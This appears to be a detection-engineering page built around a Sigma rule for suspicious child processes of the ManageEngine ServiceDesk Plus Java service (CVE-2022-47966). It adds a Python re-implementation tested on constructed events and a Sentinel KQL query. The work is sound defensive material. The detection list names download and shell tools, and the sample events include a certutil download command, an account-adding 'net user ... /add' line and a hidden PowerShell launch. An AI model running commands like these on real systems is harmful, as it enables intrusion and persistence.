Detects suspicious child processes of the “Manage Engine ServiceDesk Plus” Java web service
```yaml
title: Suspicious Child Process Of Manage Engine ServiceDesk
id: cea2b7ea-792b-405f-95a1-b903ea06458f
status: test
description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
references:
    - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/
    - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py
    - https://blog.viettelcybersecurity.com/saml-show-stopper/
author: Florian Roth (Nextron Systems)
date: 2023-01-18
modified: 2023-08-29
tags:
    - attack.command-and-control
    - attack.t1102
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains|all:
            - '\ManageEngine\ServiceDesk\'
            - '\java.exe'
        Image|endswith:
            - '\AppVLP.exe'
            - '\bash.exe'
            - '\bitsadmin.exe'
            - '\calc.exe'
            - '\certutil.exe'
            - '\cscript.exe'
            - '\curl.exe'
            - '\forfiles.exe'
            - '\mftrace.exe'
            - '\mshta.exe'
            - '\net.exe'
            - '\net1.exe'
            - '\notepad.exe' # Often used in POCs
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\query.exe'
            - '\reg.exe'
            - '\schtasks.exe'
            - '\scrcons.exe'
            - '\sh.exe'
            - '\systeminfo.exe'
            - '\whoami.exe' # Often used in POCs
            - '\wmic.exe'
            - '\wscript.exe'
            # - '\hh.exe'
            # - '\regsvr32.exe'
            # - '\rundll32.exe'
            # - '\scriptrunner.exe'
    filter_main_net:
        Image|endswith:
            - '\net.exe'
            - '\net1.exe'
        CommandLine|contains: ' stop'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate sub-processes started by Manage Engine ServiceDesk Plus
level: high
```
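The selection and filter of the rule above, written out as plain Python and run over constructed process_creation events. This is an added example for this page, not SigmaHQ code and not part of any ManageEngine or Sentinel tooling; the event fields (parent_image, image, command_line), the sample paths and the command lines are assumptions made for illustration. String matching is lower-cased on both sides because Sigma's contains and endswith modifiers are case-insensitive unless a modifier says otherwise.

```python
"""Added example: the selection/filter logic of the Sigma rule above as plain
Python, run over constructed process_creation events. Not SigmaHQ code."""

from dataclasses import dataclass

# Values copied from the rule. Lower-cased because Sigma string matching
# (contains / endswith) is case-insensitive unless a modifier says otherwise.
PARENT_MUST_CONTAIN = ("\\manageengine\\servicedesk\\", "\\java.exe")
SUSPICIOUS_CHILDREN = (
    "\\appvlp.exe", "\\bash.exe", "\\bitsadmin.exe", "\\calc.exe", "\\certutil.exe",
    "\\cscript.exe", "\\curl.exe", "\\forfiles.exe", "\\mftrace.exe", "\\mshta.exe",
    "\\net.exe", "\\net1.exe", "\\notepad.exe", "\\powershell.exe", "\\pwsh.exe",
    "\\query.exe", "\\reg.exe", "\\schtasks.exe", "\\scrcons.exe", "\\sh.exe",
    "\\systeminfo.exe", "\\whoami.exe", "\\wmic.exe", "\\wscript.exe",
)
# filter_main_net: "net stop <service>" from this parent is suppressed.
FILTER_NET_IMAGES = ("\\net.exe", "\\net1.exe")
FILTER_NET_CMDLINE = " stop"


@dataclass(frozen=True)
class ProcessCreation:
    """Minimal process_creation event (assumed field names, not a real schema)."""
    parent_image: str
    image: str
    command_line: str = ""


def selection(ev: ProcessCreation) -> bool:
    """ParentImage|contains|all and Image|endswith from the rule."""
    parent, image = ev.parent_image.lower(), ev.image.lower()
    return all(s in parent for s in PARENT_MUST_CONTAIN) and image.endswith(SUSPICIOUS_CHILDREN)


def filter_main_net(ev: ProcessCreation) -> bool:
    """filter_main_net from the rule: net.exe/net1.exe with ' stop' on the command line."""
    return ev.image.lower().endswith(FILTER_NET_IMAGES) and FILTER_NET_CMDLINE in ev.command_line.lower()


def matches(ev: ProcessCreation) -> bool:
    """condition: selection and not 1 of filter_main_*"""
    return selection(ev) and not filter_main_net(ev)


def alerts(events):
    """Return the events the rule would fire on, in input order."""
    return [ev for ev in events if matches(ev)]


# Constructed sample events (paths and command lines invented for this example).
SDP_JAVA = r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe"
SAMPLE_EVENTS = [
    # 0: typical PoC probe spawned by the ServiceDesk JVM -> alert
    ProcessCreation(SDP_JAVA, r"C:\Windows\System32\whoami.exe", "whoami"),
    # 1: service stop via net.exe -> suppressed by filter_main_net
    ProcessCreation(SDP_JAVA, r"C:\Windows\System32\net.exe",
                    'net stop "ManageEngine ServiceDesk Plus"'),
    # 2: same parent and image, but an account add -> alert (filter needs " stop")
    ProcessCreation(SDP_JAVA, r"C:\Windows\System32\net.exe",
                    "net user svc_backup Passw0rd! /add"),
    # 3: mixed-case parent and image -> still alerts (case-insensitive matching)
    ProcessCreation(r"c:\program files\manageengine\servicedesk\jre\bin\JAVA.EXE",
                    r"C:\Windows\System32\CertUtil.exe",
                    "certutil -urlcache -split -f http://192.0.2.10/a.txt a.txt"),
    # 4: a java.exe that is not ServiceDesk's -> no alert
    ProcessCreation(r"C:\Program Files\Java\jre\bin\java.exe",
                    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    "powershell -nop -w hidden"),
    # 5: cmd.exe is not in the image list -> no alert; its own children will
    #    have cmd.exe, not java.exe, as ParentImage, so they are missed too
    ProcessCreation(SDP_JAVA, r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
]

if __name__ == "__main__":
    for ev in alerts(SAMPLE_EVENTS):
        print(f"ALERT parent={ev.parent_image} image={ev.image} cmd={ev.command_line!r}")
```

Two things the run makes visible. First, the filter is narrow: a `net stop` issued by the ServiceDesk java.exe is suppressed, but `net user ... /add` from the same parent still fires, because filter_main_net requires both a net/net1 image and " stop" on the command line. Second, the rule inspects only the direct parent, and cmd.exe is not in the image list; a command launched through `cmd.exe /c` therefore produces one cmd.exe child that does not match and grandchildren whose ParentImage is cmd.exe rather than java.exe. In the Sentinel translation that follows, Sigma's ParentImage is mapped onto both ParentProcessName and ActingProcessName of the ASIM imProcessCreate schema, so the same logic applies there.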
```kql
imProcessCreate
| where (
        (ParentProcessName contains "\\ManageEngine\\ServiceDesk\\" and ParentProcessName contains "\\java.exe")
        or (ActingProcessName contains "\\ManageEngine\\ServiceDesk\\" and ActingProcessName contains "\\java.exe")
    )
    and (
        TargetProcessName endswith "\\AppVLP.exe"
        or TargetProcessName endswith "\\bash.exe"
        or TargetProcessName endswith "\\bitsadmin.exe"
        or TargetProcessName endswith "\\calc.exe"
        or TargetProcessName endswith "\\certutil.exe"
        or TargetProcessName endswith "\\cscript.exe"
        or TargetProcessName endswith "\\curl.exe"
        or TargetProcessName endswith "\\forfiles.exe"
        or TargetProcessName endswith "\\mftrace.exe"
        or TargetProcessName endswith "\\mshta.exe"
        or TargetProcessName endswith "\\net.exe"
        or TargetProcessName endswith "\\net1.exe"
        or TargetProcessName endswith "\\notepad.exe"
        or TargetProcessName endswith "\\powershell.exe"
        or TargetProcessName endswith "\\pwsh.exe"
        or TargetProcessName endswith "\\query.exe"
        or TargetProcessName endswith "\\reg.exe"
        or TargetProcessName endswith "\\schtasks.exe"
        or TargetProcessName endswith "\\scrcons.exe"
        or TargetProcessName endswith "\\sh.exe"
        or TargetProcessName endswith "\\systeminfo.exe"
        or TargetProcessName endswith "\\whoami.exe"
        or TargetProcessName endswith "\\wmic.exe"
        or TargetProcessName endswith "\\wscript.exe"
    )
    and not (
        (TargetProcessName endswith "\\net.exe" or TargetProcessName endswith "\\net1.exe")
        and TargetProcessCommandLine contains " stop"
    )
```
| Sentinel Table | Notes |
|---|---|
| imProcessCreate | Ensure this data connector is enabled |